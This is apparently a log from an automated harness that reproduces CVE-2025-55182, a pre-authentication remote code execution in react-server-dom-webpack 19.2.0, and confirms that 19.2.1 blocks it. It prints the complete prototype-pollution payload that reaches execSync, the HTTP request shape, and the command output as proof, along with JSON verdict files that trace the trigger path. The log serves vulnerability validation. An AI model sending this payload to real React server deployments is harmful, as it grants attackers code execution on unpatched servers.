[22:37:01] WORK_DIR=/data/pruva/project-cache/51211364-54ec-4ede-84ca-461fd98c7300/repo [22:37:01] ======================================== [22:37:01] PHASE 1: Vulnerable react-server-dom-webpack@19.2.0 [22:37:01] ======================================== [22:37:01] Installing packages for vulnerable (react-server-dom-webpack@19.2.0) changed 3 packages in 1s [22:37:03] Installed react-server-dom-webpack version: 19.2.0 [22:37:03] Vulnerable version loaded: 19.2.0 [22:37:03] === Starting test: vuln (react-server-dom-webpack@19.2.0) === [22:37:03] Server PID: 2185 [22:37:04] Health check passed: HEALTHY 19.2.0 [22:37:04] Running exploit against vuln... [vuln] Sending exploit to http://localhost:31337/ [vuln] Marker file: /tmp/rce_proof_1782945421_2126.txt [vuln] Payload field0: {"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B1337\"}", "_response": {"_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/rce_proof_1782945421_2126.txt 2>&1; true');", "_formData": {"get": "$1:constructor:constructor"}}} [vuln] Exception (expected if server crashed from RCE): timed out [vuln] *** RCE_CONFIRMED *** marker content: id: cannot find name for group ID 962 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962) [22:37:16] Exploit SUCCEEDED for vuln — RCE confirmed [22:37:16] RCE marker (id output): id: cannot find name for group ID 962 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962) [22:37:16] Server log for vuln: [server] react-server-dom-webpack version: 19.2.0 [server] decodeReply type: function [server] Listening on port 31337 (19.2.0) [server] POST received, Content-Type=multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad, Next-Action=x [server] Body size: 520 [server] FormData keys: 0, 1 [server] Calling decodeReply (vulnerable deserialization path)... [22:37:18] Vulnerable result: health=true rce=true [22:37:18] Vulnerable RCE evidence (id output): id: cannot find name for group ID 962 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962) [22:37:18] ======================================== [22:37:18] PHASE 2: Fixed react-server-dom-webpack@19.2.1 (negative control) [22:37:18] ======================================== [22:37:18] Installing packages for fixed (react-server-dom-webpack@19.2.1) changed 3 packages in 1s [22:37:20] Installed react-server-dom-webpack version: 19.2.1 [22:37:20] Fixed version loaded: 19.2.1 [22:37:20] === Starting test: fixed (react-server-dom-webpack@19.2.1) === [22:37:20] Server PID: 2293 [22:37:21] Health check passed: HEALTHY 19.2.1 [22:37:21] Running exploit against fixed... [fixed] Sending exploit to http://localhost:31337/ [fixed] Marker file: /tmp/rce_proof_fixed_1782945438_2126.txt [fixed] Payload field0: {"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B1337\"}", "_response": {"_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/rce_proof_fixed_1782945438_2126.txt 2>&1; true');", "_formData": {"get": "$1:constructor:constructor"}} [fixed] Response status: 200 [fixed] Response body: {"success":true,"result":"[object Object]"} [fixed] RCE_NOT_CONFIRMED — marker file does not exist [22:37:23] Exploit did NOT trigger RCE for fixed (marker file absent) [22:37:23] Server log for fixed: [server] react-server-dom-webpack version: 19.2.1 [server] decodeReply type: function [server] Listening on port 31337 (19.2.1) [server] POST received, Content-Type=multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad, Next-Action=x [server] Body size: 526 [server] FormData keys: 0, 1 [server] Calling decodeReply (vulnerable deserialization path)... [server] decodeReply completed, result: [object Object] [22:37:25] Fixed result: health=true rce=false [22:37:25] ======================================== [22:37:25] SUMMARY [22:37:25] ======================================== [22:37:25] Vulnerable: 19.2.0, health=true, RCE=true, id=id: cannot find name for group ID 962 uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962) [22:37:25] Fixed: 19.2.1, health=true, RCE=false [22:37:25] VERDICT: CVE-2025-55182 CONFIRMED — RCE in vulnerable, blocked in fixed [22:37:25] Runtime manifest written [22:37:25] RCA report written [22:37:25] Validation verdict written { "entrypoint_kind": "api_remote", "entrypoint_detail": "HTTP POST with Next-Action header and multipart/form-data body to react-server-dom-webpack decodeReply()", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "node", "react-server-dom-webpack@19.2.0", "http-server" ], "proof_artifacts": [ "logs/server_vuln.log", "logs/server_fixed.log", "repro/artifacts/request_vuln.txt", "repro/artifacts/response_vuln.txt", "repro/artifacts/request_fixed.txt", "repro/artifacts/response_fixed.txt", "repro/artifacts/rce_marker_vuln.txt", "repro/artifacts/server_vuln.log", "repro/artifacts/server_fixed.log", "logs/reproduction_steps.log" ], "notes": "Vulnerable 19.2.0 health=true RCE=true id_output=id: cannot find name for group ID 962\nuid=1000(vscode) gid=1000(vscode) groups=1000(vscode),962(962); Fixed 19.2.1 RCE=false; Confirmed=true" } { "claim_outcome": "confirmed", "claim_block_reason": null, "repro_result": "confirmed", "validated_surface": "api_remote", "evidence_scope": "realistic_harness", "claimed_impact_class": "code_execution", "observed_impact_class": "code_execution", "exploitability_confidence": "high", "attacker_controlled_input": "HTTP POST multipart/form-data body with Next-Action header", "trigger_path": "POST / -> decodeReply() -> Flight protocol reference resolution -> prototype chain -> Function constructor -> execSync", "end_to_end_target_reached": true, "sanitizer_used": false, "crash_observed": false, "read_write_primitive_observed": true, "exploit_chain_demonstrated": true, "blocking_mitigation": null, "inferred": false } [22:37:25] Proof artifacts copied to project cache [22:37:25] SUCCESS: CVE-2025-55182 reproduced — pre-auth RCE confirmed